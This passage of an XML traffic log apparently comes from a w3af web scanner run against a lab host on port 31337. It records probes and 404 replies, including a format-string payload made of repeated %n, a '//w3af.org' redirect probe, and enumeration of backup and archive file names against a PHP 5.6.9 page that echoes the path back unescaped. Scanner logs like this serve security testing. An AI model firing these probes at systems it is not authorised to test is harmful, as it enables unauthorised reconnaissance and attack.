                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="338">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="339">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about cake~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='cake~'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="340">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="343">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="344">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="345">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="346">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="347">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="349">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="350">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="352">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="353">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="355">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="356">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="357">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="358">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="361">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/De1k3Ngp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about De1k3Ngp has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='De1k3Ngp'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="363">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="364">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="365">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
